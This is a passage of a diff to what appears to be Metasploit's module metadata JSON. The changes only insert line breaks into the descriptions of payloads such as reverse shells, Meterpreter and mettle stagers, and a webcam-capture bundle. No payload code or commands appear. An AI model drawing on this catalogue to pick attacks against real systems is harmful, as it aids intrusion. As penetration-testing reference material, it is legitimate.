    "references": [

    ],
@@ -187088,7 +187653,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -187124,7 +187689,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Spawn a piped command shell (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -187159,7 +187724,7 @@
      "Spencer McIntyre",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)",
    "references": [

    ],
@@ -187199,7 +187764,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -187235,7 +187800,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [

    ],
@@ -187270,7 +187835,7 @@
      "Spencer McIntyre",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for a connection and spawn a command shell (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection and spawn a command shell (Windows x64)",
    "references": [

    ],
@@ -187305,7 +187870,7 @@
      "Spencer McIntyre",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to attacker and spawn a command shell (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to attacker and spawn a command shell (Windows x64)",
    "references": [

    ],
@@ -187340,7 +187905,7 @@
      "Spencer McIntyre",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for an IPv6 connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -187377,7 +187942,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -187414,7 +187979,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for a pipe connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -187450,7 +188015,7 @@
      "Spencer McIntyre",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for a connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -187491,7 +188056,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -187528,7 +188093,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for a connection with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -187565,7 +188130,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -187604,7 +188169,7 @@
      "agix",
      "rwincey"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -187640,7 +188205,7 @@
      "Spencer McIntyre",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -187681,7 +188246,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -187718,7 +188283,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -187755,7 +188320,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Tunnel communication over HTTP (Windows x64 winhttp)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -187792,7 +188357,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Tunnel communication over HTTPS (Windows x64 winhttp)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -187932,7 +188497,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection",
    "references": [

    ],
@@ -187967,7 +188532,7 @@
      "Spencer McIntyre",
      "OJ Reeves"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection with UUID Support",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection with UUID Support",
    "references": [

    ],
@@ -188001,7 +188566,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP",
    "references": [

    ],
@@ -188035,7 +188600,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP using SSL",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP using SSL",
    "references": [

    ],
@@ -188069,7 +188634,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -188105,7 +188670,7 @@
      "Ben Campbell <eat_meatballs@hotmail.co.uk>",
      "RageLtMan"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Reverse Python connect back stager using SSL",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nReverse Python connect back stager using SSL",
    "references": [

    ],
@@ -188140,7 +188705,7 @@
      "Spencer McIntyre",
      "OJ Reeves"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker with UUID Support",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -188174,7 +188739,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Connect to the victim and spawn a Meterpreter shell",
+    "description": "Execute a Python payload from a command.\n\nConnect to the victim and spawn a Meterpreter shell",
    "references": [

    ],
@@ -188208,7 +188773,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Connect back to the attacker and spawn a Meterpreter shell",
+    "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell",
    "references": [

    ],
@@ -188242,7 +188807,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Connect back to the attacker and spawn a Meterpreter shell",
+    "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell",
    "references": [

    ],
@@ -188276,7 +188841,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Connect back to the attacker and spawn a Meterpreter shell",
+    "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell",
    "references": [

    ],
@@ -188311,7 +188876,7 @@
      "Spencer McIntyre",
      "asoto-r7"
    ],
-    "description": "Execute a Python payload from a command. Listens for a connection from the attacker, sends a UUID, then terminates",
+    "description": "Execute a Python payload from a command.\n\nListens for a connection from the attacker, sends a UUID, then terminates",
    "references": [

    ],
@@ -188346,7 +188911,7 @@
      "Spencer McIntyre",
      "asoto-r7"
    ],
-    "description": "Execute a Python payload from a command. Connects back to the attacker, sends a UUID, then terminates",
+    "description": "Execute a Python payload from a command.\n\nConnects back to the attacker, sends a UUID, then terminates",
    "references": [

    ],
@@ -188381,7 +188946,7 @@
      "Spencer McIntyre",
      "mumbai"
    ],
-    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
+    "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
    "references": [

    ],
@@ -188416,7 +188981,7 @@
      "Spencer McIntyre",
      "Ben Campbell <eat_meatballs@hotmail.co.uk>"
    ],
-    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
+    "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
    "references": [

    ],
@@ -188451,7 +189016,7 @@
      "Spencer McIntyre",
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
+    "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
    "references": [

    ],
@@ -188486,7 +189051,7 @@
      "Spencer McIntyre",
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
+    "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
    "references": [

    ],
@@ -189034,7 +189599,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Run a meterpreter server in Java. Listen for a connection",
+    "description": "Run a meterpreter server in Java.\n\nListen for a connection",
    "references": [

    ],
@@ -189071,7 +189636,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Run a meterpreter server in Java. Tunnel communication over HTTP",
+    "description": "Run a meterpreter server in Java.\n\nTunnel communication over HTTP",
    "references": [

    ],
@@ -189108,7 +189673,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Run a meterpreter server in Java. Tunnel communication over HTTPS",
+    "description": "Run a meterpreter server in Java.\n\nTunnel communication over HTTPS",
    "references": [

    ],
@@ -189144,7 +189709,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Run a meterpreter server in Java. Connect back stager",
+    "description": "Run a meterpreter server in Java.\n\nConnect back stager",
    "references": [

    ],
@@ -189179,7 +189744,7 @@
      "mihi",
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Listen for a connection",
+    "description": "Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else).\n\nListen for a connection",
    "references": [

    ],
@@ -189214,7 +189779,7 @@
      "mihi",
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager",
+    "description": "Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else).\n\nConnect back stager",
    "references": [

    ],
@@ -189283,7 +189848,7 @@
    "author": [
      "Adam Cammack <adam_cammack@rapid7.com>"
    ],
-    "description": "Inject the mettle server payload (staged). Connect back to the attacker",
+    "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -189425,7 +189990,7 @@
    "author": [

    ],
-    "description": "dup2 socket in x12, then execve. Connect back to the attacker",
+    "description": "dup2 socket in x12, then execve.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -189704,7 +190269,7 @@
      "Adam Cammack <adam_cammack@rapid7.com>",
      "nemo <nemo@felinemenace.org>"
    ],
-    "description": "Inject the mettle server payload (staged). Listen for a connection",
+    "description": "Inject the mettle server payload (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -189740,7 +190305,7 @@
      "nemo <nemo@felinemenace.org>",
      "tkmru"
    ],
-    "description": "Inject the mettle server payload (staged). Connect back to the attacker",
+    "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -189882,7 +190447,7 @@
    "author": [
      "nemo <nemo@felinemenace.org>"
    ],
-    "description": "dup2 socket in r12, then execve. Listen for a connection",
+    "description": "dup2 socket in r12, then execve.\n\nListen for a connection",
    "references": [

    ],
@@ -189917,7 +190482,7 @@
      "nemo <nemo@felinemenace.org>",
      "tkmru"
    ],
-    "description": "dup2 socket in r12, then execve. Connect back to the attacker",
+    "description": "dup2 socket in r12, then execve.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -190165,7 +190730,7 @@
      "juan vazquez <juan.vazquez@metasploit.com>",
      "tkmru"
    ],
-    "description": "Inject the mettle server payload (staged). Connect back to the attacker",
+    "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -190343,7 +190908,7 @@
      "juan vazquez <juan.vazquez@metasploit.com>",
      "tkmru"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -190486,7 +191051,7 @@
      "juan vazquez <juan.vazquez@metasploit.com>",
      "tkmru"
    ],
-    "description": "Inject the mettle server payload (staged). Connect back to the attacker",
+    "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -190664,7 +191229,7 @@
      "juan vazquez <juan.vazquez@metasploit.com>",
      "tkmru"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -191334,7 +191899,7 @@
      "Brent Cook <bcook@rapid7.com>",
      "ricky"
    ],
-    "description": "Inject the mettle server payload (staged). Listen for a connection",
+    "description": "Inject the mettle server payload (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -191370,7 +191935,7 @@
      "ricky",
      "tkmru"
    ],
-    "description": "Inject the mettle server payload (staged). Connect back to the attacker",
+    "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -191580,7 +192145,7 @@
    "author": [
      "ricky"
    ],
-    "description": "Spawn a command shell (staged). Listen for a connection",
+    "description": "Spawn a command shell (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -191615,7 +192180,7 @@
      "ricky",
      "tkmru"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -191961,7 +192526,7 @@
      "kris katterjohn <katterjohn@gmail.com>",
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Inject the mettle server payload (staged). Listen for an IPv6 connection (Linux x86)",
+    "description": "Inject the mettle server payload (staged).\n\nListen for an IPv6 connection (Linux x86)",
    "references": [

    ],
@@ -191998,7 +192563,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the mettle server payload (staged). Listen for an IPv6 connection with UUID Support (Linux x86)",
+    "description": "Inject the mettle server payload (staged).\n\nListen for an IPv6 connection with UUID Support (Linux x86)",
    "references": [

    ],
@@ -192033,7 +192598,7 @@
      "William Webb <william_webb@rapid7.com>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject the mettle server payload (staged). Listen for a connection",
+    "description": "Inject the mettle server payload (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -192069,7 +192634,7 @@
      "skape <mmiller@hick.org>",
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Inject the mettle server payload (staged). Listen for a connection (Linux x86)",
+    "description": "Inject the mettle server payload (staged).\n\nListen for a connection (Linux x86)",
    "references": [

    ],
@@ -192106,7 +192671,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the mettle server payload (staged). Listen for a connection with UUID Support (Linux x86)",
+    "description": "Inject the mettle server payload (staged).\n\nListen for a connection with UUID Support (Linux x86)",
    "references": [

    ],
@@ -192141,7 +192706,7 @@
      "William Webb <william_webb@rapid7.com>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject the mettle server payload (staged). Use an established connection",
+    "description": "Inject the mettle server payload (staged).\n\nUse an established connection",
    "references": [

    ],
@@ -192176,7 +192741,7 @@
      "William Webb <william_webb@rapid7.com>",
      "kris katterjohn <katterjohn@gmail.com>"
    ],
-    "description": "Inject the mettle server payload (staged). Connect back to attacker over IPv6",
+    "description": "Inject the mettle server payload (staged).\n\nConnect back to attacker over IPv6",
    "references": [

    ],
@@ -192211,7 +192776,7 @@
      "William Webb <william_webb@rapid7.com>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject the mettle server payload (staged). Connect back to the attacker",
+    "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -192248,7 +192813,7 @@
      "egypt <egypt@metasploit.com>",
      "tkmru"
    ],
-    "description": "Inject the mettle server payload (staged). Connect back to the attacker",
+    "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -192285,7 +192850,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the mettle server payload (staged). Connect back to the attacker",
+    "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -192531,7 +193096,7 @@
      "kris katterjohn <katterjohn@gmail.com>",
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Spawn a command shell (staged). Listen for an IPv6 connection (Linux x86)",
+    "description": "Spawn a command shell (staged).\n\nListen for an IPv6 connection (Linux x86)",
    "references": [

    ],
@@ -192568,7 +193133,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Spawn a command shell (staged). Listen for an IPv6 connection with UUID Support (Linux x86)",
+    "description": "Spawn a command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Linux x86)",
    "references": [

    ],
@@ -192602,7 +193167,7 @@
    "author": [
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a command shell (staged). Listen for a connection",
+    "description": "Spawn a command shell (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -192637,7 +193202,7 @@
      "skape <mmiller@hick.org>",
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Spawn a command shell (staged). Listen for a connection (Linux x86)",
+    "description": "Spawn a command shell (staged).\n\nListen for a connection (Linux x86)",
    "references": [

    ],
@@ -192673,7 +193238,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Spawn a command shell (staged). Listen for a connection with UUID Support (Linux x86)",
+    "description": "Spawn a command shell (staged).\n\nListen for a connection with UUID Support (Linux x86)",
    "references": [

    ],
@@ -192707,7 +193272,7 @@
    "author": [
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a command shell (staged). Use an established connection",
+    "description": "Spawn a command shell (staged).\n\nUse an established connection",
    "references": [

    ],
@@ -192742,7 +193307,7 @@
      "skape <mmiller@hick.org>",
      "kris katterjohn <katterjohn@gmail.com>"
    ],
-    "description": "Spawn a command shell (staged). Connect back to attacker over IPv6",
+    "description": "Spawn a command shell (staged).\n\nConnect back to attacker over IPv6",
    "references": [

    ],
@@ -192776,7 +193341,7 @@
    "author": [
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -192812,7 +193377,7 @@
      "egypt <egypt@metasploit.com>",
      "tkmru"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -192848,7 +193413,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -193265,7 +193830,7 @@
    "author": [
      "OJ Reeves"
    ],
-    "description": "Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTP",
+    "description": "Handle Meterpreter sessions regardless of the target arch/platform.\n\nTunnel communication over HTTP",
    "references": [

    ],
@@ -193299,7 +193864,7 @@
    "author": [
      "OJ Reeves"
    ],
-    "description": "Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTPS",
+    "description": "Handle Meterpreter sessions regardless of the target arch/platform.\n\nTunnel communication over HTTPS",
    "references": [

    ],
@@ -193333,7 +193898,7 @@
    "author": [
      "toto"
    ],
-    "description": "Connect to the NetWare console (staged). Connect back to the attacker",
+    "description": "Connect to the NetWare console (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -193471,7 +194036,7 @@
    "author": [
      "hdm <x@hdm.io>"
    ],
-    "description": "Spawn a command shell (staged). Listen for a connection",
+    "description": "Spawn a command shell (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -193505,7 +194070,7 @@
    "author": [
      "hdm <x@hdm.io>"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -193539,7 +194104,7 @@
    "author": [
      "hdm <x@hdm.io>"
    ],
-    "description": "Spawn a command shell (staged). Listen for a connection",
+    "description": "Spawn a command shell (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -193573,7 +194138,7 @@
    "author": [
      "hdm <x@hdm.io>"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -193709,7 +194274,7 @@
    "author": [
      "hdm <x@hdm.io>"
    ],
-    "description": "Spawn a command shell (staged). Listen for a connection",
+    "description": "Spawn a command shell (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -193743,7 +194308,7 @@
    "author": [
      "hdm <x@hdm.io>"
    ],
-    "description": "Spawn a command shell (staged). Use an established connection",
+    "description": "Spawn a command shell (staged).\n\nUse an established connection",
    "references": [

    ],
@@ -193777,7 +194342,7 @@
    "author": [
      "hdm <x@hdm.io>"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -193880,7 +194445,7 @@
      "nemo",
      "nemo <nemo@felinemenace.org>"
    ],
-    "description": "dup2 socket in edi, then execve. Listen, read length, read buffer, execute",
+    "description": "dup2 socket in edi, then execve.\n\nListen, read length, read buffer, execute",
    "references": [

    ],
@@ -193915,7 +194480,7 @@
      "nemo",
      "nemo <nemo@felinemenace.org>"
    ],
-    "description": "dup2 socket in edi, then execve. Connect, read length, read buffer, execute",
+    "description": "dup2 socket in edi, then execve.\n\nConnect, read length, read buffer, execute",
    "references": [

    ],
@@ -193950,7 +194515,7 @@
      "nemo",
      "timwr"
    ],
-    "description": "dup2 socket in edi, then execve. Connect back to the attacker with UUID Support (OSX x64)",
+    "description": "dup2 socket in edi, then execve.\n\nConnect back to the attacker with UUID Support (OSX x64)",
    "references": [

    ],
@@ -194022,7 +194587,7 @@
      "timwr",
      "nemo <nemo@felinemenace.org>"
    ],
-    "description": "Inject the mettle server payload (staged). Listen, read length, read buffer, execute",
+    "description": "Inject the mettle server payload (staged).\n\nListen, read length, read buffer, execute",
    "references": [
      "URL-https://github.com/CylanceVulnResearch/osx_runbin",
      "URL-https://github.com/nologic/shellcc"
@@ -194060,7 +194625,7 @@
      "timwr",
      "nemo <nemo@felinemenace.org>"
    ],
-    "description": "Inject the mettle server payload (staged). Connect, read length, read buffer, execute",
+    "description": "Inject the mettle server payload (staged).\n\nConnect, read length, read buffer, execute",
    "references": [
      "URL-https://github.com/CylanceVulnResearch/osx_runbin",
      "URL-https://github.com/nologic/shellcc"
@@ -194097,7 +194662,7 @@
      "nologic",
      "timwr"
    ],
-    "description": "Inject the mettle server payload (staged). Connect back to the attacker with UUID Support (OSX x64)",
+    "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker with UUID Support (OSX x64)",
    "references": [
      "URL-https://github.com/CylanceVulnResearch/osx_runbin",
      "URL-https://github.com/nologic/shellcc"
@@ -194376,7 +194941,7 @@
    "author": [
      "ddz <ddz@theta44.org>"
    ],
-    "description": "Inject a custom Mach-O bundle into the exploited process. Listen, read length, read buffer, execute",
+    "description": "Inject a custom Mach-O bundle into the exploited process.\n\nListen, read length, read buffer, execute",
    "references": [

    ],
@@ -194410,7 +194975,7 @@
    "author": [
      "ddz <ddz@theta44.org>"
    ],
-    "description": "Inject a custom Mach-O bundle into the exploited process. Connect, read length, read buffer, execute",
+    "description": "Inject a custom Mach-O bundle into the exploited process.\n\nConnect, read length, read buffer, execute",
    "references": [

    ],
@@ -194480,7 +195045,7 @@
    "author": [
      "ddz <ddz@theta44.org>"
    ],
-    "description": "Inject a Mach-O bundle to capture a photo from the iSight (staged). Listen, read length, read buffer, execute",
